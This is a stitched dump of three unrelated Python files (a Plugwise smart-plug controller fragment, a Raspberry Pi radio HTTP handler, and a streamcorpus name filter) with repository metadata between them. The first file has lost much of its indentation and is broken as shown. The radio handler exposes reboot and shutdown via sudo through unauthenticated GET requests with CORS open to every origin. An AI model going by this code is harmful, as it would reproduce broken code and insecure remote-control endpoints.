debug("start with first %d, last %d, idx %d, last_dt %s" % (first, last, idx, last_dt.strftime("%Y-%m-%d %H:%M")))
#check for buffer wrap around
#The last log_idx is 6015. 6016 is for the range function
if last < first:
if (first == 6015 and idx == 4) or first >= 6016:
first = 0
else:
#last = 6016
#TODO: correct if needed
last = 6015
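        #Worked example of the wrap-around handling above:
        #  first=6015, idx=4 -> the circular buffer wrapped; restart reading at first=0
        #  otherwise (last < first without a detected wrap) clamp last to 6015
        #  and read up to the end of the buffer.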
log = []
try:
            #read one more than requested to determine the interval of the first measurement
#TODO: fix after reading debug log
            if last_dt is None:
if first>0:
powlist = c.get_power_usage_history(first-1)
last_dt = powlist[3][0]
#The unexpected case where both consumption and production are logged
#Probably this case does not work at all
if powlist[1][0]==powlist[2][0]:
#not correct for out of sync usage and production buffer
#the returned value will be production only
last_dt=powlist[2][0]
debug("determine last_dt - buffer dts: %s %s %s %s" %
(powlist[0][0].strftime("%Y-%m-%d %H:%M"),
powlist[1][0].strftime("%Y-%m-%d %H:%M"),
powlist[2][0].strftime("%Y-%m-%d %H:%M"),
powlist[3][0].strftime("%Y-%m-%d %H:%M")))
elif first == 0:
powlist = c.get_power_usage_history(0)
if len(powlist) > 2 and powlist[0][0] is not None and powlist[1][0] is not None:
last_dt = powlist[0][0]
#subtract the interval between index 0 and 1
last_dt -= powlist[1][0] - powlist[0][0]
else:
#last_dt cannot be determined yet. wait for 2 hours of recordings. return.
info("log_recording: last_dt cannot be determined. circles did not record data yet.")
return
#loop over log addresses and write to file
for log_idx in range(first, last+1):
buffer = c.get_power_usage_history(log_idx, last_dt)
idx = idx % 4
debug("len buffer: %d, production: %s" % (len(buffer), c.production))
for i, (dt, watt, watt_hour) in enumerate(buffer):
                    if i >= idx and dt is not None and dt >= last_dt:
#if the timestamp is identical to the previous, add production to usage
                        #in case of hourly production logging and at the end of daylight saving,
                        #duplicate timestamps can be present for two subsequent hours.
                        #Testing that the index is odd handles this.
idx = i + 1
                        if dt == last_dt and c.production and (i & 1):
tdt, twatt, twatt_hour = log[-1]
twatt+=watt
twatt_hour+=watt_hour
log[-1]=[tdt, twatt, twatt_hour]
else:
log.append([dt, watt, watt_hour])
info("circle buffers: %s %d %s %d %d" % (mac, log_idx, dt.strftime("%Y-%m-%d %H:%M"), watt, watt_hour))
debug("proce with first %d, last %d, idx %d, last_dt %s" % (first, last, idx, last_dt.strftime("%Y-%m-%d %H:%M")))
last_dt = dt
# if idx < 4:
# #not completely read yet.
# last -= 1
# if idx >= 4:
# #not completely read yet.
# last += 1
#idx = idx % 4
# #TODO: buffer is also len=4 for production?
# if len(buffer) == 4 or (len(buffer) == 2 and c.production == True):
# for i, (dt, watt, watt_hour) in enumerate(buffer):
# if not dt is None:
# #if the timestamp is identical to the previous, add production to usage
# #in case of hourly production logging, and end of daylightsaving, duplicate
# #timestamps can be present for two subsequent hours. Test the index
# #to be odd handles this.
# if dt == last_dt and c.production == True and i & 1:
# tdt, twatt, twatt_hour = log[-1]
# twatt+=watt
# twatt_hour+=watt_hour
# log[-1]=[tdt, twatt, twatt_hour]
# else:
# log.append([dt, watt, watt_hour])
# debug("circle buffers: %s %d %s %d %d" % (mac, log_idx, dt.strftime("%Y-%m-%d %H:%M"), watt, watt_hour))
# last_dt = dt
# else:
# last -= 1
except ValueError:
return
#error("Error: Failed to read power usage")
except (TimeoutException, SerialException) as reason:
#TODO: Decide on retry policy
#do nothing means that it is retried after one hour (next call to this function).
error("Error in log_recording() wile reading history buffers - %s" % (reason,))
return
debug("end with first %d, last %d, idx %d, last_dt %s" % (first, last, idx, last_dt.strftime("%Y-%m-%d %H:%M")))
#update last_log outside try block.
#this results in a retry at the next call to log_recording
c.last_log = last
c.last_log_idx = idx
c.last_log_ts = calendar.timegm((last_dt+timedelta(seconds=time.timezone)).utctimetuple())
# if c.loginterval <60:
# dayfname = self.daylogfnames[mac]
# f=open(dayfname,'a')
# else:
# f=open(fname,'a')
        #initialisation to a value in the past.
        #6016 log addresses * 4 one-hour samples each gives roughly 1002 days of history,
        #so just set this several years back: circles may have been unplugged for a while.
fileopen = False
f = None
prev_dt = datetime.now()-timedelta(days=2000)
for dt, watt, watt_hour in log:
            if dt is not None:
watt = "%15.4f" % (watt,)
watt_hour = "%15.4f" % (watt_hour,)
if epochf:
ts_str = str(calendar.timegm((dt+timedelta(seconds=time.timezone)).utctimetuple()))
else:
ts_str = dt.strftime("%Y-%m-%d %H:%M:%S")
#print("%s, %s, %s" % (ts_str, watt, watt_hour))
#use year folder determined by timestamps in circles
yrfold = str(dt.year)+'/'
if not os.path.exists(perpath+yrfold+actdir):
os.makedirs(perpath+yrfold+actdir)
if not os.path.exists(perpath+yrfold+logdir):
os.makedirs(perpath+yrfold+logdir)
if c.interval <60:
#log in daily file if interval < 60 minutes
if prev_dt.date() != dt.date():
#open new daily log file
if fileopen:
f.close()
ndate = dt.date().isoformat()
# persistent iso tmp
newfname= perpath + yrfold + logdir + logpre + ndate + '-' + mac + logpost
self.daylogfnames[mac]=newfname
f=open(newfname,'a')
else:
#log in the yearly files
if prev_dt.year != dt.year:
if fileopen:
f.close()
newfname= perpath + yrfold + logdir + logpre + mac + logpost
self.logfnames[mac]=newfname
f=open(newfname,'a')
fileopen = True
prev_dt = dt
f.write("%s, %s, %s\n" % (ts_str, watt, watt_hour))
#debug("MQTT put value in qpub")
msg = str('{"typ":"pwenergy","ts":%s,"mac":"%s","power":%s,"energy":%s,"interval":%d}' % (ts_str, mac, watt.strip(), watt_hour.strip(),c.interval))
qpub.put((self.ftopic("energy", mac), msg, True))
        if f is not None:
f.close()
if fileopen:
info("circle buffers: %s %s read from %d to %d" % (mac, c.name, first, last))
#store lastlog addresses to file
with open(self.lastlogfname, 'w') as f:
for c in self.circles:
f.write("%s, %d, %d, %d\n" % (c.mac, c.last_log, c.last_log_idx, c.last_log_ts))
return fileopen #if fileopen actual writing to log files took place
# def log_recordings(self):
# debug("log_recordings")
# for mac, idx in self.controlsbymac.iteritems():
# self.log_recording(self.controls[idx], mac)
def test_offline(self):
"""
When an unrecoverable communication failure with a circle occurs, the circle
        is set online = False. This function tests for this condition and, if offline,
        checks whether the circle is available again; if so, it will recover
control settings and switching schedule if needed.
In case the circle was offline during initialization, a reinit is performed.
"""
for c in self.circles:
if not c.online:
try:
c.ping()
if c.online:
                        #back online. Make sure switch and schedule are ok
if not c.initialized:
c.reinit()
self.set_interval_production(c)
idx=self.controlsbymac[c.mac]
self.apply_control_to_circle(self.controls[idx], c.mac)
except ValueError:
continue
except (TimeoutException, SerialException) as reason:
debug("Error in test_offline(): %s" % (reason,))
continue
def reset_all(self):
#NOTE: Untested function, for example purposes
print("Untested function, for example purposes")
print("Aborting. Remove next line to continue")
        krak  #deliberate NameError: aborts execution here
#
#TODO: Exception handling
for c in self.circles:
if c.name != 'circle+':
print('resetting '+c.name)
c.reset()
for c in self.circles:
if c.name == 'circle+':
print('resetting '+c.name)
c.reset()
print('resetting stick')
self.device.reset()
print('sleeping 60 seconds to allow devices to be reset themselves')
time.sleep(60)
def init_network(self):
#NOTE: Untested function, for example purposes
print("Untested function, for example purposes")
print("Aborting. Remove next line to continue")
        krak  #deliberate NameError: aborts execution here
#TODO: Exception handling
#
#connect stick and circle+ (=network controller)
#
        #First query status. An exception is expected due to a short 0011 response.
#000A/0011
try:
self.device.status()
        except Exception:
pass
success = False
for i in range(0,10):
print("Trying to connect to circleplus ...")
#try to locate a circleplus on the network
#0001/0002/0003 request/responses
try:
success = self.device.find_circleplus()
            except Exception:
#Not sure whether something should be handled
pass
#try to connect to circleplus on the network
#0004/0005
if success:
try:
self.device.connect_circleplus()
                except Exception:
pass
#now unsolicited 0061 FFFD messages may arrive from circleplus
#
#now check for proper (long) status reply
#000A/0011
try:
self.device.status()
#stop the retry loop in case of success
break
            except Exception:
success = False
print("sleep 30 seconds for next retry ...")
time.sleep(30)
def connect_node_by_mac(self, newnodemac):
#TODO: Exception handling
#
#the circleplus maintains a table of known nodes
#nodes can be added to this table without ever having been on the network.
# s.join_node('mac', True), where s is the Stick object
#nodes can also be removed from the table with methods:
# cp.remove_node('mac'), where cp is the circleplus object.
#for demonstrative purposes read and print the table
print(self.circles[0].read_node_table())
#Inform network that nodes are allowed to join the network
#Nodes may start advertising themselves with a 0006 message.
self.device.enable_joining(True)
time.sleep(5)
#0006 may be received
#Now add the given mac id to the circleplus node table
self.device.join_node(newnodemac, True)
        #now unsolicited 0061 FFFD messages may arrive from the node if it was in a reset state
        #
        #sleep to allow a reset node to become operational
time.sleep(60)
#
#test the node, assuming it is already in the configuration files
try:
print(self.circles[self.bymac[newnodemac]].get_info())
        except Exception:
print('new node not detected ...')
#
#end the joining process
self.device.enable_joining(False)
#
#Finally read and print the table of nodes again
print(self.circles[0].read_node_table())
def connect_unknown_nodes(self):
for newnodemac in self.device.unjoined:
newnode = None
try:
newnode = self.circles[self.bymac[newnodemac]]
            except KeyError:
info("connect_unknown_node: not joining node with MAC %s: not in configuration" % (newnodemac,))
            #accept or reject join based on occurrence in pw-conf.json
            self.device.join_node(newnodemac, newnode is not None)
#clear the list
self.device.unjoined.clear()
#a later call to self.test_offline will initialize the new circle(s)
#self.test_offline()
def run(self):
global mqtt
locnow = datetime.utcnow()-timedelta(seconds=time.timezone)
now = locnow
day = now.day
hour = now.hour
minute = now.minute
dst = time.localtime().tm_isdst
self.sync_time()
self.dump_status()
#self.log_recordings()
# #SAMPLE: demonstration of connecting 'unknown' nodes
        # #First a known node gets removed and reset, and then
# #it is added again by the connect_node_by_mac() method.
# cp=self.circles[0]
# c=self.circles[6]
# try:
# c.reset()
# except:
# pass
# cp.remove_node(c.mac)
# time.sleep(60)
# cp.remove_node(c.mac)
# time.sleep(2)
# try:
# print c.get_info()
# except:
# pass
# self.connect_node_by_mac(c.mac)
# try:
# print c.get_info()
# except:
# pass
circleplus = None
for c in self.circles:
try:
if c.get_info()['type'] == 'circle+':
circleplus = c
            except Exception:
pass
        if circleplus is not None:
debug("joined node table: %s" % (circleplus.read_node_table(),))
#Inform network that nodes are allowed to join the network
#Nodes may start advertising themselves with a 0006 message.
self.device.enable_joining(True)
logrecs = True
while 1:
#check whether user defined configuration has been changed
#when schedules are changed, this call can take over ten seconds!
self.test_offline()
self.poll_configuration()
##align with the next ten seconds.
#time.sleep(10-datetime.now().second%10)
#align to next 10 second boundary, while checking for input commands.
ref = datetime.now()
proceed_at = ref + timedelta(seconds=(10 - ref.second%10), microseconds= -ref.microsecond)
while datetime.now() < proceed_at:
if mqtt: self.process_mqtt_commands()
time.sleep(0.5)
#prepare for logging values
prev_dst = dst
prev_day = day
prev_hour = hour
prev_minute = minute
#now = datetime.now()
#local time not following DST (always non-DST)
locnow = datetime.utcnow()-timedelta(seconds=time.timezone)
now = locnow
dst = time.localtime().tm_isdst
day = now.day
hour = now.hour
minute = now.minute
#read historic data only one circle per minute
if minute != prev_minute:
logrecs = True
#get relays state just after each new quarter hour for circles operating a schedule.
if minute % 15 == 0 and now.second > 8:
self.get_relays()
            #add configured unjoined nodes every minute,
            #even though the join window is only re-enabled every hour
if minute != prev_minute:
self.connect_unknown_nodes()
if day != prev_day:
self.setup_actfiles()
self.ten_seconds()
self.log_status()
if hour != prev_hour:
#self.hourly()
logrecs = True
#self.log_recordings()
self.rsync_to_persistent()
if hour == 4:
self.sync_time()
info("Daily 4 AM: time synced circles.")
                #Allow reset or unknown nodes to join the network every hour
#NOTE: Not fully tested.
try:
self.device.enable_joining(True)
                except Exception:
error("PWControl.run(): Communication error in enable_joining")
self.dump_status()
if day != prev_day:
#self.daily()
self.cleanup_tmp()
            #Hourly log_recordings. Process one circle every ten seconds.
            if logrecs:
                wrote_log = False
                for c in self.circles:
                    idx = self.controlsbymac[c.mac]
                    if self.log_recording(self.controls[idx], c.mac):
                        #actual recordings written to logfile;
                        #allow the next circle to be logged in the next ten seconds.
                        wrote_log = True
                        break
                if not wrote_log:
                    #all circles have been processed
                    logrecs = False
#update schedules after change in DST. Update one every ten seconds
for c in self.circles:
                if c.online and c.schedule is not None and c.schedule.dst != time.localtime().tm_isdst:
info("Circle '%s' schedule shift due to DST changed." % (c.name,))
idx=self.controlsbymac[c.mac]
self.apply_control_to_circle(self.controls[idx], c.mac, force=True)
break
#test
# self.log_recordings()
# self.rsync_to_persistent()
# self.setup_actfiles()
# self.cleanup_tmp()
init_logger(logpath+"pw-logger.log", "pw-logger")
log_level(logging.DEBUG)
log_comm(True)
try:
qpub = queue.Queue()
qsub = queue.Queue()
mqtt_t = None
if not mqtt:
error("No MQTT python binding installed (mosquitto-python)")
elif 'mqtt_ip' in cfg and 'mqtt_port' in cfg:
#connect to server and start worker thread.
if 'mqtt_user' in cfg and 'mqtt_password' in cfg:
mqttclient = Mqtt_client(cfg['mqtt_ip'], cfg['mqtt_port'], qpub, qsub,"Plugwise-2-py",cfg['mqtt_user'],cfg['mqtt_password'])
else:
mqttclient = Mqtt_client(cfg['mqtt_ip'], cfg['mqtt_port'], qpub, qsub, "Plugwise-2-py")
mqttclient.subscribe("plugwise2py/cmd/#")
mqtt_t = threading.Thread(target=mqttclient.run)
        mqtt_t.daemon = True
mqtt_t.start()
info("MQTT thread started")
else:
error("No MQTT broker and port configured")
mqtt = False
main=PWControl()
main.run()
except:
close_logcomm()
raise
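#Hedged usage sketch (not part of the program): with the MQTT bridge enabled,
#commands can be injected from the shell. The broker address and the circle
#MAC below are hypothetical placeholders.
#
#  mosquitto_pub -h 192.168.1.2 -t "plugwise2py/cmd/switch/000D6F0000ABCDEF" \
#      -m '{"mac":"000D6F0000ABCDEF","cmd":"switch","val":"on"}'
#
#State updates can then be observed with:
#
#  mosquitto_sub -h 192.168.1.2 -t "plugwise2py/state/#"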
|
SevenW/Plugwise-2-py
|
devtools/Join-2.py
|
Python
|
gpl-3.0
| 58,244 | 0.009546 |
import SimpleHTTPServer
import sqlite3 as lite
import sys
import urlparse
import datetime
import json
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
class TrackListHandler(BaseHTTPRequestHandler):
def do_OPTIONS(self):
self.send_response(200)
        self.send_header('Content-type', 'application/json; charset=utf8')
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Access-Control-Allow-Methods', 'GET, POST, OPTIONS')
self.send_header("Access-Control-Allow-Headers", "X-Requested-With")
self.send_header("Access-Control-Allow-Headers", "Authorization")
def do_GET(self):
parsedParameters = urlparse.urlparse(self.path)
queryParsed = urlparse.parse_qs(parsedParameters.query)
if( 'type' in queryParsed ):
typeString = queryParsed['type']
if('addTrack' in typeString):
trackUriString = queryParsed['trackUri']
userString = queryParsed['user']
dedicateString = queryParsed['dedicate']
commentsString = queryParsed['comments']
self.addTrack(trackUriString, userString, dedicateString, commentsString)
elif('getTrack' in typeString):
trackUriString = queryParsed['trackUri']
self.getTrack(trackUriString)
elif('getTrackRating' in typeString):
trackUriString = queryParsed['trackUri']
self.getTrackRating(trackUriString)
elif('likeTrack' in typeString):
trackUriString = queryParsed['trackUri']
trackNameString = queryParsed['trackname']
trackArtistString = queryParsed['artist']
trackAlbumString = queryParsed['album']
self.likeTrack(trackUriString, trackNameString, trackArtistString, trackAlbumString)
elif('voteToSkipTrack' in typeString):
trackUriString = queryParsed['trackUri']
trackNameString = queryParsed['trackname']
trackArtistString = queryParsed['artist']
trackAlbumString = queryParsed['album']
self.voteToSkipTrack(trackUriString, trackNameString, trackArtistString, trackAlbumString)
elif('getTrackVotes' in typeString):
trackUriString = queryParsed['trackUri']
self.getTrackVotes(trackUriString)
elif('getTrackVotesAndRating' in typeString):
trackUriString = queryParsed['trackUri']
self.getTrackVotesAndRating(trackUriString)
elif('getTrendingTracks' in typeString):
self.getTrendingTracks()
elif('shutdownPi' in typeString):
self.shutdownPi()
elif('rebootPi' in typeString):
self.rebootPi()
else:
            SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
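    # Hedged request examples matching the dispatch above; the host/port and
    # the track URI are hypothetical placeholders:
    #
    #   GET /?type=getTrack&trackUri=spotify:track:123
    #   GET /?type=addTrack&trackUri=spotify:track:123&user=alice&dedicate=bob&comments=hi
    #   GET /?type=voteToSkipTrack&trackUri=spotify:track:123&trackname=X&artist=Y&album=Z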
def getTrack(self, trackUri):
self.send_response(200)
self.send_header("Access-Control-Allow-Headers", "Authorization")
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-type', 'application/json; charset=utf8')
self.end_headers()
if trackUri[0]:
con = lite.connect('db/radiopi.db')
con.text_factory = str
with con:
cur = con.cursor()
cur.execute("SELECT TrackUri, ChosenBy, DedicatedTo, Comments FROM Tracklist WHERE TrackUri=:TrackUri", {"TrackUri": trackUri[0]})
con.commit()
row = cur.fetchone()
#returnedTrackUri, returnedChosenBy, returnedComments = cur.fetchone()
print row[0], row[1], row[2], row[3]
self.wfile.write('{0}({1})'.format('jsonpGetTrackCallback', {'userString':row[1], 'dedicatedToString':row[2], 'commentString':row[3]}))
self.wfile.close()
def addTrack(self, trackUri, user, dedicate, comments):
self.send_response(200)
self.send_header("Access-Control-Allow-Headers", "Authorization")
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-type', 'application/json; charset=utf8')
self.end_headers()
if trackUri[0]:
con = lite.connect('db/radiopi.db')
with con:
cur = con.cursor()
cur.execute("insert into Tracklist (TrackUri, ChosenBy, DedicatedTo, Comments, DateAdded) values (?, ?, ?, ?, date('now'))",(trackUri[0], user[0], dedicate[0], comments[0]))
self.wfile.write('{0}({1})'.format('jsonpAddTrackCallback', {'trackUriString':trackUri[0], 'userString':user[0], 'dedicatedToString':dedicate[0],'commentString':comments[0]}))
self.wfile.close()
def likeTrack(self, trackUri, trackname, artist, album):
self.send_response(200)
self.send_header("Access-Control-Allow-Headers", "Authorization")
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-type', 'application/json; charset=utf8')
self.end_headers()
if trackUri[0]:
con = lite.connect('db/radiopi.db')
with con:
cur = con.cursor()
cur.execute("Select count(*) from UpVote where HostAddress=:HostAddress AND TrackUri=:TrackUri AND DateVoted=date('now')", {"HostAddress": self.client_address[0], "TrackUri": trackUri[0]})
con.commit()
row = cur.fetchone()
print row[0]
if row[0] < 1:
cur.execute("insert into UpVote (TrackUri, DateVoted, HostAddress, TrackName, Artist, Album) values (?, date('now'), ?, ?, ?, ?)",(trackUri[0],self.client_address[0],trackname[0], artist[0], album[0],))
self.wfile.write('{0}({1})'.format('jsonpLikeTrackCallback', {'trackUriString':trackUri[0], 'likeAdded':'true'}))
self.wfile.close()
else:
self.wfile.write('{0}({1})'.format('jsonpLikeTrackCallback', {'trackUriString':trackUri[0], 'likeAdded':'false', 'failedLikeReason':'You may only like a track once'}))
self.wfile.close()
#cur = con.cursor()
#cur.execute("insert into UpVote (TrackUri, DateVoted) values (?, date('now'))",(trackUri[0],))
#self.wfile.write('{0}({1})'.format('jsonpLikeTrackCallback', {'trackUriString':trackUri[0]}))
#self.wfile.close()
def voteToSkipTrack(self, trackUri, trackname, artist, album):
self.send_response(200)
self.send_header("Access-Control-Allow-Headers", "Authorization")
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-type', 'application/json; charset=utf8')
self.end_headers()
if trackUri[0]:
con = lite.connect('db/radiopi.db')
with con:
today = datetime.datetime.now()
todayStr = "%s-%s-%s" % (today.year, today.month, today.day)
cur = con.cursor()
cur.execute("Select count(*) from votetoskip where HostAddress=:HostAddress AND TrackUri=:TrackUri AND DateVoted=date('now')", {"HostAddress": self.client_address[0], "TrackUri": trackUri[0]})
con.commit()
row = cur.fetchone()
print row[0]
if row[0] < 1:
cur.execute("insert into VoteToSkip (TrackUri, DateVoted, HostAddress, TrackName, Artist, Album) values (?, date('now'), ?, ?, ?, ?)",(trackUri[0],self.client_address[0],trackname[0], artist[0], album[0],))
self.wfile.write('{0}({1})'.format('jsonpVoteToSkipTrackCallback', {'trackUriString':trackUri[0], 'voteAdded':'true'}))
self.wfile.close()
else:
                    self.wfile.write('{0}({1})'.format('jsonpVoteToSkipTrackCallback', {'trackUriString':trackUri[0], 'voteAdded':'false', 'failedVoteReason':'Sorry, you have exceeded your daily skipping quota for this track - but if the song is that bad, someone else will surely click the button'}))
self.wfile.close()
def getTrackVotes(self, trackUri):
self.send_response(200)
self.send_header("Access-Control-Allow-Headers", "Authorization")
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-type', 'application/json; charset=utf8')
self.end_headers()
if trackUri[0]:
con = lite.connect('db/radiopi.db')
with con:
cur = con.cursor()
cur.execute("SELECT COUNT(*) FROM VoteToSkip WHERE TrackUri=:TrackUri", {"TrackUri": trackUri[0],})
con.commit()
row = cur.fetchone()
print row[0]
self.wfile.write('{0}({1})'.format('jsonpGetTrackVotesCallback', {'trackVotes':row[0]}))
self.wfile.close()
def getTrackRating(self, trackUri):
self.send_response(200)
self.send_header("Access-Control-Allow-Headers", "Authorization")
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-type', 'application/json; charset=utf8')
self.end_headers()
if trackUri[0]:
con = lite.connect('db/radiopi.db')
con.text_factory = str
with con:
cur = con.cursor()
cur.execute("SELECT COUNT(*) FROM UpVote WHERE TrackUri=:TrackUri", {"TrackUri": trackUri[0],})
con.commit()
row = cur.fetchone()
print row[0]
self.wfile.write('{0}({1})'.format('jsonpGetTrackRatingCallback', {'trackRating':row[0]}))
self.wfile.close()
def getTrackVotesAndRating(self, trackUri):
self.send_response(200)
self.send_header("Access-Control-Allow-Headers", "Authorization")
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-type', 'application/json; charset=utf8')
self.end_headers()
if trackUri[0]:
con = lite.connect('db/radiopi.db')
con.text_factory = str
with con:
cur = con.cursor()
cur.execute("SELECT COUNT(*) FROM UpVote WHERE TrackUri=:TrackUri", {"TrackUri": trackUri[0],})
con.commit()
upVoteRow = cur.fetchone()
print upVoteRow[0]
cur.execute("SELECT COUNT(*) FROM VoteToSkip WHERE TrackUri=:TrackUri", {"TrackUri": trackUri[0],})
con.commit()
skipRow = cur.fetchone()
print skipRow[0]
totalVotes = skipRow[0] - upVoteRow[0]
self.wfile.write('{0}({1})'.format('jsonpGetTrackVotesAndRatingCallback', {'totalTrackVotes':totalVotes, "skipVotes":skipRow[0], "rating":upVoteRow[0], "trackUri":trackUri[0] }))
self.wfile.close()
def getTrendingTracks(self):
self.send_response(200)
self.send_header("Access-Control-Allow-Headers", "Authorization")
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-type', 'application/json; charset=utf8')
self.end_headers()
con = lite.connect('db/radiopi.db')
con.text_factory = str
with con:
cur = con.cursor()
cur.execute("select trackuri, TrackName, Artist, Album, count(*) as totalvotes from upvote group by trackuri order by totalvotes desc;")
con.commit()
rows = cur.fetchall()
#rows = [ dict(rec) for rec in recs ]
self.wfile.write('{0}({1})'.format('jsonpGetTrendingTracksCallback', {'trendingTracks':json.dumps(rows)}))
self.wfile.close()
def rebootPi(self):
self.send_response(200)
self.send_header("Access-Control-Allow-Headers", "Authorization")
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-type', 'application/json; charset=utf8')
self.end_headers()
command = "/usr/bin/sudo /sbin/shutdown -r now"
import subprocess
process = subprocess.Popen(command.split(), stdout=subprocess.PIPE)
output = process.communicate()[0]
print output
def shutdownPi(self):
self.send_response(200)
self.send_header("Access-Control-Allow-Headers", "Authorization")
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-type', 'application/json; charset=utf8')
self.end_headers()
command = "/usr/bin/sudo /sbin/shutdown -h now"
import subprocess
process = subprocess.Popen(command.split(), stdout=subprocess.PIPE)
output = process.communicate()[0]
print output
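#Hedged bootstrap sketch, assuming this handler is served standalone on port
#8000 (port and db path are assumptions, not from the original project):
#
# if __name__ == '__main__':
#     server = HTTPServer(('', 8000), TrackListHandler)
#     server.serve_forever()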
|
paulburkinshaw/mopidy-radio-pi
|
mopidy_radio_pi/static/MyHandler.py
|
Python
|
apache-2.0
| 11,919 | 0.043544 |
'''python example of filtering through strings from a
streamcorpus.StreamItem to find names from a FilterName
'''
from __future__ import absolute_import
import logging
import os
import sys
from cStringIO import StringIO
## import the thrift library
from thrift import Thrift
from thrift.transport.TTransport import TBufferedTransport
from thrift.protocol.TBinaryProtocol import TBinaryProtocol
## pure python TBinaryProtocol is slow, so attempt to replace it with
## faster implementation
from thrift.protocol.TBinaryProtocol import TBinaryProtocolAccelerated
fastbinary_import_failure = None
try:
from thrift.protocol import fastbinary
    raise Exception() ## deliberately skip fastbinary and fall back to pure Python
## use faster C program to read/write
TBinaryProtocol = TBinaryProtocolAccelerated
except Exception, exc:
fastbinary_import_failure = exc
## fall back to pure python
## thrift message classes from core streamcorpus library
from streamcorpus import StreamItem, Rating, Label, Annotator, Offset, OffsetType, Target
## thrift message class from this package
from streamcorpus_filter.ttypes import FilterNames
logger = logging.getLogger(__name__)
class Filter(object):
def __init__(self):
self.filter_names = None
self._names = None
self.token_boundary_chars = set([' ', '\n', '\s', '\t', '\r'])
def load_filter_names(self, path_to_thrift_message):
'''reads a FilterNames message from a flat file
'''
if not os.path.exists(path_to_thrift_message):
raise Exception('path does not exist: %r' % path_to_thrift_message)
fh = open(path_to_thrift_message, 'rb')
# This is a lame workaround to a bug in Thrift experienced
# during unit tests. Thrift cannot handle files in
# non-blocking mode that could return from .read() with less
# than the asked for data. read(-1) seems to force reading all
# the data, and once we have it all in memory it is safe for
# Thrift to read it.
raw = fh.read(-1)
logger.debug('read %s bytes of %r', len(raw), path_to_thrift_message)
fh = StringIO(raw)
i_transport = TBufferedTransport(fh)
i_protocol = TBinaryProtocol(i_transport)
self.filter_names = FilterNames()
self.filter_names.read(i_protocol)
## not actually required in CPython
fh.close()
def save_filter_names(self, path_to_thrift_message=None, file_obj=None):
'''writes a FilterNames message to a flat file
'''
if path_to_thrift_message:
if os.path.exists(path_to_thrift_message):
print('warning: overwriting: %r' % path_to_thrift_message)
o_transport = open(path_to_thrift_message, 'wb')
elif file_obj:
o_transport = file_obj
else:
raise Exception('must specify either path_to_thrift_message or file_obj')
o_protocol = TBinaryProtocol(o_transport)
self.filter_names.write(o_protocol)
o_transport.close()
def invert_filter_names(self):
'''constructs FilterNames.name_to_target_ids from
FilterNames.target_id_to_names
'''
if self.filter_names.name_to_target_ids:
print('warning: replacing existing FilterNames.name_to_target_ids')
self.filter_names.name_to_target_ids = dict()
for target_id in self.filter_names.target_id_to_names:
for name in self.filter_names.target_id_to_names[target_id]:
if name not in self.filter_names.name_to_target_ids:
self.filter_names.name_to_target_ids[name] = list()
self.filter_names.name_to_target_ids[name].append(target_id)
print('%d names, %d target_ids' % (len(self.filter_names.name_to_target_ids),
len(self.filter_names.target_id_to_names)))
def compile_filters(self):
if not self.filter_names:
raise Exception('must first load FilterNames')
## for this simple example, all we do is convert the utf-8
## from FilterNames into unicode
self._names = dict()
for name in self.filter_names.name_to_target_ids:
self._names[name.decode('utf8')] = self.filter_names.name_to_target_ids[name]
def register_token_boundary_char(self, char):
'''
add a unicode character to the set of symbols consider
equivalent to "token boundary"
'''
self.token_boundary_chars.add(char)
def advance_passed_boundary(self):
'''
        advance self.text_position past the current boundary, if
        possible, and detect whether a token boundary was passed.
'''
start_text_position = self.text_position
while self.text_position < len(self.text) and self.text[self.text_position] in self.token_boundary_chars:
self.text_position += 1
if self.text_position == len(self.text):
return False
elif start_text_position != self.text_position:
## consumed some characters, so we must have reached a new token
return True
elif self.text_position == 0:
## special case for start of document
return True
else:
## have not passed a boundary
return False
def advance_to_boundary(self):
'''
        advance self.text_position to the next boundary or the end of self.text
'''
while self.text_position < len(self.text) and self.text[self.text_position] not in self.token_boundary_chars:
self.text_position += 1
def apply_filters(self, stream_item, content_form='clean_html'):
'''iterates over the characters in stream_item.body.<content_form>
looking for strings that exact match keys in
self.filter_names.name_to_target_ids'''
if not self._names:
raise Exception('must first have a compiled set of filters')
annotator_id = 'streamcorpus-filter'
annotator = Annotator(annotator_id=annotator_id)
text = getattr(stream_item.body, content_form)
## pass text around by reference as a property on this class instance
self.text = text.decode('utf8')
## inefficient brute force loop for each name
for name in self._names:
name_tokens = name.split('\\W')
name_token_i = 0
self.text_position = 0
first_char_position = None
while name_tokens and self.text_position < len(self.text):
#print 'starting', self.text_position, name_token_i, name_tokens
reached_start_of_new_token = self.advance_passed_boundary()
if not reached_start_of_new_token:
self.advance_to_boundary()
continue
name_tok = name_tokens[name_token_i]
#print 'on a token', self.text_position, name_token_i, name_tok, self.text[self.text_position:self.text_position + len(name_tok)]
if name_tok != self.text[self.text_position : self.text_position + len(name_tok)]:
name_token_i = 0
first_char_position = None
self.text_position += 1
                else:
                    #record the match start before consuming the first token
                    if first_char_position is None:
                        first_char_position = self.text_position
                    name_token_i += 1
                    self.text_position += len(name_tok)
if name_token_i == len(name_tokens):
print 'found one!'
## reset state machine for next possible match in this document
name_token_i = 0
for target_id in self._names[name]:
target = Target(target_id=target_id)
rating = Rating(annotator=annotator, target=target)
label = Label( annotator=annotator, target=target)
label.offsets[OffsetType.CHARS] = Offset(
type=OffsetType.CHARS,
first=first_char_position,
                            length=self.text_position - first_char_position)
if annotator_id not in stream_item.body.labels:
stream_item.body.labels[annotator_id] = list()
stream_item.body.labels[annotator_id].append(label)
if annotator_id not in stream_item.ratings:
stream_item.ratings[annotator_id] = list()
stream_item.ratings[annotator_id].append(rating)
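#Hedged usage sketch; the message path and the stream_item object are
#hypothetical placeholders:
#
# f = Filter()
# f.load_filter_names('filter-names.thrift')
# f.invert_filter_names()   # only needed if name_to_target_ids is empty
# f.compile_filters()
# f.apply_filters(stream_item)  # adds Labels/Ratings under 'streamcorpus-filter'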
|
streamcorpus/streamcorpus-filter
|
